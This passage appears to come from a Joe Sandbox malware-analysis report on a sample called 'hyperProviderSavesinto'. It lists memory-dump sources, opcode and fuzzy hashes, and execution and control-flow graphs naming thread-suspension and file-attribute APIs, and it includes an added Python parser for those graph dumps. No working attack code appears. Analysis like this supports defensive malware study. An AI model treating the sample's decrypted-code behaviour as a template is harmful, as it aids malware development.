                                                        • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                        • Instruction Fuzzy Hash: 08E09239601A0487EB658F62D90838B3AE1FB8DF46F04C028C98947361DF7DC4D9C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Execution Graph

                                                        Execution Coverage:2.9%
                                                        Dynamic/Decrypted Code Coverage:75%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:12
                                                        Total number of Limit Nodes:0
                                                        execution_graph, four independent chains (node id (address, API)):
                                                        • 13723 (7ffd9bc50a93) -> 13724 (7ffd9bc50acb, ResumeThread) -> 13726 (7ffd9bc50ba4)
                                                        • 13715 (7ffd9bc4f26d) -> 13716 (7ffd9bc4f27b, SuspendThread) -> 13718 (7ffd9bc4f354)
                                                        • 13719 (7ffd9bc50bf9) -> 13720 (7ffd9bc50c07, FindCloseChangeNotification) -> 13722 (7ffd9bc50ce4)
                                                        • 13727 (7ffd9bc528d5) -> 13728 (7ffd9bc528ef, GetFileAttributesW) -> 13730 (7ffd9bc529b5)
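                                                        The execution_graph and control_flow_graph dumps in this report are emitted by the Joe Sandbox IDA plugin as a single run of tokens: a node id followed by a start address or a start-end range, then any API name or `call <addr>` label attached to that node, and `src->dst` edges. The Python below is an added example, not code from the report or from Joe Sandbox: it parses that token format into nodes and edges and lists, per entry node, the Win32 APIs or call targets reachable from it, which is the quickest way to read the call sequence (SuspendThread, ResumeThread, GetFileAttributesW) out of the decrypted region without the graph images. The grammar is inferred from the lines on this page and is an assumption; the sample inputs are the report's own execution_graph line and one of its control_flow_graph lines, embedded as constructed strings.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed input: the execution_graph line of this report, verbatim.
EXECUTION_GRAPH = (
    "execution_graph 13723 7ffd9bc50a93 13724 7ffd9bc50acb ResumeThread 13723->13724 "
    "13726 7ffd9bc50ba4 13724->13726 13715 7ffd9bc4f26d 13716 7ffd9bc4f27b SuspendThread "
    "13715->13716 13718 7ffd9bc4f354 13716->13718 13719 7ffd9bc50bf9 13720 7ffd9bc50c07 "
    "FindCloseChangeNotification 13719->13720 13722 7ffd9bc50ce4 13720->13722 "
    "13727 7ffd9bc528d5 13728 7ffd9bc528ef GetFileAttributesW 13727->13728 "
    "13730 7ffd9bc529b5 13728->13730"
)

# Constructed input: one control_flow_graph line of this report (it has "call <addr>"
# labels, address ranges, a loop back to the entry block and a self-loop 215->215).
CONTROL_FLOW_GRAPH = (
    "control_flow_graph 194 7ffd9ba90c25-7ffd9ba90c41 196 7ffd9ba90c7b-7ffd9ba90c8f "
    "194->196 197 7ffd9ba90c43-7ffd9ba90c58 194->197 199 7ffd9ba90c96 call 7ffd9ba90960 "
    "196->199 200 7ffd9ba90c91 196->200 201 7ffd9ba90be8-7ffd9ba90c05 197->201 "
    "202 7ffd9ba90c5a-7ffd9ba90c77 197->202 204 7ffd9ba90c9b-7ffd9ba90ca8 199->204 "
    "200->199 201->194 202->196 209 7ffd9ba90cab-7ffd9ba90caf 204->209 "
    "211 7ffd9ba90ccc-7ffd9ba90d66 call 7ffd9ba90498 209->211 212 7ffd9ba90cb1-7ffd9ba90cc8 "
    "209->212 211->209 215 7ffd9ba90cca 212->215 215->215"
)


@dataclass
class Node:
    nid: int
    start: int                # start address of the block / function chunk
    end: Optional[int]        # end address when the dump gives a range, else None
    labels: List[str] = field(default_factory=list)   # API names or "call <addr>"


@dataclass
class Graph:
    kind: str                 # "execution_graph" or "control_flow_graph"
    nodes: Dict[int, Node] = field(default_factory=dict)   # insertion order = dump order
    edges: List[Tuple[int, int]] = field(default_factory=list)


_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ADDR = re.compile(r"^([0-9a-fA-F]+)(?:-([0-9a-fA-F]+))?$")


def parse_graph(line: str) -> Graph:
    """Tokenize one graph line. Assumed grammar (inferred from this report):
    <kind> ( <id> <addr>[-<addr>] { <ApiName> | call <addr> }* | <id>-><id> )*
    Every non-edge token after a node belongs to that node as a label."""
    toks = line.split()
    if not toks:
        raise ValueError("empty graph line")
    g = Graph(kind=toks[0])
    i, cur = 1, None
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            g.edges.append((int(m.group(1)), int(m.group(2))))
            cur = None
            i += 1
            continue
        if t.isdigit() and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            a = _ADDR.match(toks[i + 1])
            end = int(a.group(2), 16) if a.group(2) else None
            cur = Node(int(t), int(a.group(1), 16), end)
            g.nodes[cur.nid] = cur
            i += 2
            continue
        if cur is None:
            raise ValueError(f"unexpected token {t!r} at position {i}")
        if t == "call" and i + 1 < len(toks):
            cur.labels.append(f"call {toks[i + 1]}")
            i += 2
        else:
            cur.labels.append(t)
            i += 1
    return g


def successors(g: Graph, nid: int) -> List[int]:
    return [dst for src, dst in g.edges if src == nid]


def entries(g: Graph) -> List[int]:
    """Nodes nothing else points to (self-loops ignored). When every node is a loop
    target, as in a CFG whose entry block is re-entered, fall back to the first-dumped node."""
    targets = {dst for src, dst in g.edges if src != dst}
    ents = [nid for nid in g.nodes if nid not in targets]
    return ents or ([next(iter(g.nodes))] if g.nodes else [])


def reachable_labels(g: Graph, start: int) -> List[str]:
    """Labels of every node reachable from start, depth-first, each node visited once."""
    seen, order, stack = set(), [], [start]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        order.extend(g.nodes[n].labels)
        stack.extend(reversed(successors(g, n)))
    return order


def api_summary(g: Graph) -> Dict[int, List[str]]:
    """Entry node id -> API / call labels reachable from it."""
    return {e: reachable_labels(g, e) for e in entries(g)}


def format_graph(g: Graph) -> str:
    lines = [f"{g.kind}: {len(g.nodes)} nodes, {len(g.edges)} edges"]
    for n in g.nodes.values():
        span = f"{n.start:x}" + (f"-{n.end:x}" if n.end is not None else "")
        lab = f"  [{', '.join(n.labels)}]" if n.labels else ""
        lines.append(f"  {n.nid}: {span}{lab} -> {successors(g, n.nid)}")
    return "\n".join(lines)


if __name__ == "__main__":
    for line in (EXECUTION_GRAPH, CONTROL_FLOW_GRAPH):
        graph = parse_graph(line)
        print(format_graph(graph))
        print("APIs by entry:", api_summary(graph))
```

                                                        Run against the report's own lines this yields one entry per chain for the execution graph (ResumeThread, SuspendThread, FindCloseChangeNotification and GetFileAttributesW, each in its own chain), and for the control-flow graph a single entry at block 194 reaching the two `call` targets. The node ids in these dumps are IDA plugin counters, not addresses; only the start/end fields are code locations, and they belong to the JIT region at 7ffd9b... that the report marks "based on PE: false".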

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3b0f6e8d6a156aebad6b7b636b735f66db165967b14cc8c66301bab57e37b3
                                                        • Instruction ID: 125639abeec5725345f3908f05acb31954423512816af8e1d6a81d7cf139c47b
                                                        • Opcode Fuzzy Hash: 1c3b0f6e8d6a156aebad6b7b636b735f66db165967b14cc8c66301bab57e37b3
                                                        • Instruction Fuzzy Hash: 32A1A372A19A4D8FEBA8DBA8C8657AD7FE1FF59314F04027AD008D72D6CB742901CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3662cbe442673abb4712def9a9435782bd5dbb5df7b04d192f47d8482169c59f
                                                        • Instruction ID: 7d8152d80dc15c36fa2647f4aed40686f1b7d512448df248fb66c39ee2c275a1
                                                        • Opcode Fuzzy Hash: 3662cbe442673abb4712def9a9435782bd5dbb5df7b04d192f47d8482169c59f
                                                        • Instruction Fuzzy Hash: F8518C70A0D78C8FDB55DFA8C855AEDBBF0EF16310F0441ABD049DB292DA74A846CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: ChangeCloseFindNotification
                                                        • String ID:
                                                        • API String ID: 2591292051-0
                                                        • Opcode ID: 2f886601d1417f0e5d1e8aaea16c11cc800d50c15b7750e61c2fad01d478faac
                                                        • Instruction ID: c1ea0910dfa9ae01292a52ae9ffed498327435a2e387a2bbd167783d15e3e22c
                                                        • Opcode Fuzzy Hash: 2f886601d1417f0e5d1e8aaea16c11cc800d50c15b7750e61c2fad01d478faac
                                                        • Instruction Fuzzy Hash: EE416C70E0864C8FDB59DFA8C895BEDBBF0FF5A310F1441AAD049D7292DA74A885CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph nodes (id: address range, API):
                                                        • 21: 7ffd9bc4f26d-7ffd9bc4f279
                                                        • 22: 7ffd9bc4f284-7ffd9bc4f352, SuspendThread
                                                        • 23: 7ffd9bc4f27b-7ffd9bc4f283
                                                        • 26: 7ffd9bc4f354
                                                        • 27: 7ffd9bc4f35a-7ffd9bc4f3a4
                                                        Edges: 21->22, 21->23, 22->26, 22->27, 23->22, 26->27
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: SuspendThread
                                                        • String ID:
                                                        • API String ID: 3178671153-0
                                                        • Opcode ID: 23ceb2652d241249569d200b2c42b496d604fa85eaa77b0d0581e06db524704f
                                                        • Instruction ID: 4156a297e3447d4ff29dd53ccbedf7269753c6d97e88fb15eb97c3ec9cd586d1
                                                        • Opcode Fuzzy Hash: 23ceb2652d241249569d200b2c42b496d604fa85eaa77b0d0581e06db524704f
                                                        • Instruction Fuzzy Hash: 2F414870E0864C8FDB98DFA8D895AEDBBF0FF5A310F10416AD049E7292DA70A845CF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph nodes (id: address range, API):
                                                        • 30: 7ffd9bc528d5-7ffd9bc529b3, GetFileAttributesW
                                                        • 34: 7ffd9bc529bb-7ffd9bc529f9
                                                        • 35: 7ffd9bc529b5
                                                        Edges: 30->34, 30->35, 35->34
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 70317395efe4f00f2b75e57ac3bbffbf91882747edbb0582aa86345595cd5751
                                                        • Instruction ID: 658d99e365132b62eb30931dd3f01cfc9fabce384b1b242ec315100e9e4bc06f
                                                        • Opcode Fuzzy Hash: 70317395efe4f00f2b75e57ac3bbffbf91882747edbb0582aa86345595cd5751
                                                        • Instruction Fuzzy Hash: 1D41F970E0861C8FDB98DF98D895BEDBBF0FB69310F10416AD049E7252DA71A886CB41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: w
                                                        • API String ID: 0-476252946
                                                        • Opcode ID: 0a35b77629fbe4e5865c7c212998d44c4f8b4cc4ee428ba97b77cae2cb506476
                                                        • Instruction ID: ebb83ff1053d28718e7c5a2ce18462cd6e93c2a4bae6e156b4d851c485281339
                                                        • Opcode Fuzzy Hash: 0a35b77629fbe4e5865c7c212998d44c4f8b4cc4ee428ba97b77cae2cb506476
                                                        • Instruction Fuzzy Hash: DA310C70A0A56ECEEBB0DB54C8547ECB3F0FB14341F5181FAD04DE62A1DA786A85AF41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $
                                                        • API String ID: 0-3993045852
                                                        • Opcode ID: 603ac81d82be8566eb6b9197545065167fbf88532b286bc1457800799fe9b75d
                                                        • Instruction ID: d2d38f3a78fd7fc1f195111289487be210e2516ae497560e267d3bb986990223
                                                        • Opcode Fuzzy Hash: 603ac81d82be8566eb6b9197545065167fbf88532b286bc1457800799fe9b75d
                                                        • Instruction Fuzzy Hash: 62113D30A0652A8BEB75DB58C8583E8B3B0FB58301F5041E9D10DA62A1CBB85B84DF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph nodes (id: address range):
                                                        • 143: 7ffd9ba90908-7ffd9baa8934
                                                        • 145: 7ffd9baa8936
                                                        • 146: 7ffd9baa893b-7ffd9baa8941
                                                        • 147: 7ffd9baa8a15-7ffd9baa8a1b
                                                        • 148: 7ffd9baa8946-7ffd9baa897c
                                                        • 149: 7ffd9baa8a21-7ffd9baa8a2a
                                                        • 151: 7ffd9baa8982-7ffd9baa89ef
                                                        • 156: 7ffd9baa8a0d-7ffd9baa8a12
                                                        • 157: 7ffd9baa89f1-7ffd9baa89fa
                                                        • 158: 7ffd9baa89fc-7ffd9baa8a0c
                                                        Edges: 143->145, 143->146, 145->146, 146->147, 147->148, 147->149, 148->151, 151->156, 151->157, 156->147, 157->156, 157->158
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a647fb2b6dbfabde9e2f149581ac7f510e47f7768b6d3194a2f120de617206bf
                                                        • Instruction ID: f1cf7c6b5bc2f5843325657e17a82d28bffa3f98c7ceb19e411caf00e2677d0f
                                                        • Opcode Fuzzy Hash: a647fb2b6dbfabde9e2f149581ac7f510e47f7768b6d3194a2f120de617206bf
                                                        • Instruction Fuzzy Hash: E4518E30A0490D9FCF84EF98D494EED7BF1FF58365B150169E419E7260DA74E990CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: faf0244bb2077aebd082eed1580c8cf6c76090892effa0387ae10fa86ed10a6d
                                                        • Instruction ID: 7068b307004dda9ee2dfa22e3970c719b8b6a0e7b05d784bd87a9e97c691b2dd
                                                        • Opcode Fuzzy Hash: faf0244bb2077aebd082eed1580c8cf6c76090892effa0387ae10fa86ed10a6d
                                                        • Instruction Fuzzy Hash: 7E410630E1490D9FDB98EF98C895AEDB7B1FF68305F140169E409E32A5CA74A941CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph nodes (id: address range, call target):
                                                        • 194: 7ffd9ba90c25-7ffd9ba90c41
                                                        • 196: 7ffd9ba90c7b-7ffd9ba90c8f
                                                        • 197: 7ffd9ba90c43-7ffd9ba90c58
                                                        • 199: 7ffd9ba90c96, call 7ffd9ba90960
                                                        • 200: 7ffd9ba90c91
                                                        • 201: 7ffd9ba90be8-7ffd9ba90c05
                                                        • 202: 7ffd9ba90c5a-7ffd9ba90c77
                                                        • 204: 7ffd9ba90c9b-7ffd9ba90ca8
                                                        • 209: 7ffd9ba90cab-7ffd9ba90caf
                                                        • 211: 7ffd9ba90ccc-7ffd9ba90d66, call 7ffd9ba90498
                                                        • 212: 7ffd9ba90cb1-7ffd9ba90cc8
                                                        • 215: 7ffd9ba90cca
                                                        Edges: 194->196, 194->197, 196->199, 196->200, 197->201, 197->202, 199->204, 200->199, 201->194, 202->196, 204->209, 209->211, 209->212, 211->209, 212->215, 215->215
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a842ff4410c9291d28eb9d71bcc94ac9ea565aa153c9382a365b8bd8076360f
                                                        • Instruction ID: 1df0100237998fafd6339b4c3491276d066f9e5f38c0406a0c76a2c9201c825e
                                                        • Opcode Fuzzy Hash: 0a842ff4410c9291d28eb9d71bcc94ac9ea565aa153c9382a365b8bd8076360f
                                                        • Instruction Fuzzy Hash: 2C213B36B0E25E4AF732A7A89C211ED3720DF52765F054673D1689A1E3C9A8220A8759
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph nodes (id: address range, call target):
                                                        • 220: 7ffd9ba99998-7ffd9ba99aa6
                                                        • 225: 7ffd9ba99ab1-7ffd9ba99b03
                                                        • 226: 7ffd9ba99b0c-7ffd9ba99b3d, call 7ffd9ba90780
                                                        • 229: 7ffd9ba9996d-7ffd9ba99974
                                                        • 230: 7ffd9ba99b43-7ffd9ba99b4d
                                                        • 231: 7ffd9ba99976-7ffd9ba99990
                                                        • 232: 7ffd9ba99994-7ffd9ba9999e
                                                        • 234: 7ffd9ba999f8-7ffd9ba99a02
                                                        • 235: 7ffd9ba999a0-7ffd9ba999b5
                                                        • 236: 7ffd9ba99a09-7ffd9ba99a2d
                                                        • 237: 7ffd9ba99a04
                                                        Edges: 220->225, 225->226, 226->229, 226->230, 229->231, 229->232, 230->229, 231->220, 232->234, 232->235, 234->236, 234->237, 235->229, 236->229, 237->236
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 02b6cafdea001264dc4f5cae4407ac6a2c1ca6b9386bf85548c462afcee23982
                                                        • Instruction ID: eb0774a669b12d7eca50357311110106de346cf151a99d1aa99c2199855a8d79
                                                        • Opcode Fuzzy Hash: 02b6cafdea001264dc4f5cae4407ac6a2c1ca6b9386bf85548c462afcee23982
                                                        • Instruction Fuzzy Hash: 3C31AA30A0891DCFDFA8DB14C855AE9B3F0FB68315F1081EA904DE3265DE719A85CF80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c701a808d74f3cfe2000c58b6df61ba93b6236ff9353545bac8b799e6bd573c1
                                                        • Instruction ID: b393e79da7add56237894022cc08ea5137005f17f00aca5029f6ef8c5bcc9dc3
                                                        • Opcode Fuzzy Hash: c701a808d74f3cfe2000c58b6df61ba93b6236ff9353545bac8b799e6bd573c1
                                                        • Instruction Fuzzy Hash: 42213C30A1490E9FDB94EFA8C8A49ADB7F1FF28340B11057AD409D72A5DF74A941CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bbae01ca8c9b24497b982a7cdfdea10a0d3f8d3e3fd4a65bbe93407284e39689
                                                        • Instruction ID: 8d999399296df56589e325432264ea534b8a3f30c374bd155c9f6242a02bf0d0
                                                        • Opcode Fuzzy Hash: bbae01ca8c9b24497b982a7cdfdea10a0d3f8d3e3fd4a65bbe93407284e39689
                                                        • Instruction Fuzzy Hash: B3112B32B0E25E4FF7329BA4C8201E97770EF42750F064573D054DB1E2D978260AC754
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b23c1176e9d648bbbbab0b8c233bbab8ed981c1ae1f9c032554971dcb6c7e81d
                                                        • Instruction ID: 372a02387984f28fe87acbf17d84e923e4ce6a03abbb6c9748fd05d3d7e853fd
                                                        • Opcode Fuzzy Hash: b23c1176e9d648bbbbab0b8c233bbab8ed981c1ae1f9c032554971dcb6c7e81d
                                                        • Instruction Fuzzy Hash: 2211E932F0E69E8FF7229BA4C8201E97770EF52751F064573D064DB1E2CA782609D755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf0ee676f075118abbcd2d56977f898033df8b78ac00b3fdde7b3462f49d1a9f
                                                        • Instruction ID: 522b3d866955fdcf05ba05bfc613df30db51b14656e891056ce999eb6ecc4fca
                                                        • Opcode Fuzzy Hash: bf0ee676f075118abbcd2d56977f898033df8b78ac00b3fdde7b3462f49d1a9f
                                                        • Instruction Fuzzy Hash: 18117C3162924DCFCB44EF6CC8919EA77A0FF58308F0102AAE84CD7251C730B565CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9a2234ce25a44b511623a0fa62e1b505e646d83d5a641cdd3a58b8919a9b822b
                                                        • Instruction ID: 48173338e25a1f27fc863425756757f06bbaabf729558f1e637124febb549ad6
                                                        • Opcode Fuzzy Hash: 9a2234ce25a44b511623a0fa62e1b505e646d83d5a641cdd3a58b8919a9b822b
                                                        • Instruction Fuzzy Hash: 1A11DB31F0E29E8FE7229B64C8201E97B70EF42751F0645B3D064DB1E2DA783609C755
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f7781692454fa25b38ff5f85e8884dfcd84dfe6d6a5ecdb39deeb86e179fa61e
                                                        • Instruction ID: 594e7a21e9ad476f9c4d3c1ca5cc41edc949a07883730a193aed2e8cf2d604b1
                                                        • Opcode Fuzzy Hash: f7781692454fa25b38ff5f85e8884dfcd84dfe6d6a5ecdb39deeb86e179fa61e
                                                        • Instruction Fuzzy Hash: 82F03031A0964E9FEB60EF98D8596EDB7E1FF54300F110437E90CC21A0DBB462A48B94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 998eb7bb752996239fed5c967584f0827bdcc866618ea077d11860721a7acb96
                                                        • Instruction ID: 3b3c5d9ce807fc00c1717934460f2f686ceb0d6a79bc7fce525ccdcf1dd04652
                                                        • Opcode Fuzzy Hash: 998eb7bb752996239fed5c967584f0827bdcc866618ea077d11860721a7acb96
                                                        • Instruction Fuzzy Hash: 0EF0BD3091494D9FDF94EF58C448AAA7BE0FF28304F01456AF818D3260D630E594CB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4ae1aef31b9b6cc8379d358deaf00049ef9a414c64ef64c224a68b8697a2af3
                                                        • Instruction ID: d2757681098fb3b3d70d8dac65e63d124bc0106d0d8cc4016c8d2a3917b483f0
                                                        • Opcode Fuzzy Hash: e4ae1aef31b9b6cc8379d358deaf00049ef9a414c64ef64c224a68b8697a2af3
                                                        • Instruction Fuzzy Hash: EAF0123091564D9FEB90EFA4C9496EE7BE1FF54304F014466E81CD2160DB70A6A4CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1753098550.00007FFD9BA90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9ba90000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3388c7e528237f0736662ab1296a48a7b2067dc720f78fff7d1b96c4dc7465eb
                                                        • Instruction ID: c69756b6fa9998b7396033a2a0895cbe33fd7812ae86667b2e8893eb20fe2442
                                                        • Opcode Fuzzy Hash: 3388c7e528237f0736662ab1296a48a7b2067dc720f78fff7d1b96c4dc7465eb
                                                        • Instruction Fuzzy Hash: 1DF05831F1D51A4BE7B8DB28C8A82B866B1EF85304F0101F6E10DE61E5CE742E829F40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1755047453.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_7ffd9bc40000_hyperProviderSavesinto.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e885fb1de6b33c8836a5cf327a6586278a6dc8325f5f06cc0bad73f1b52aaf2
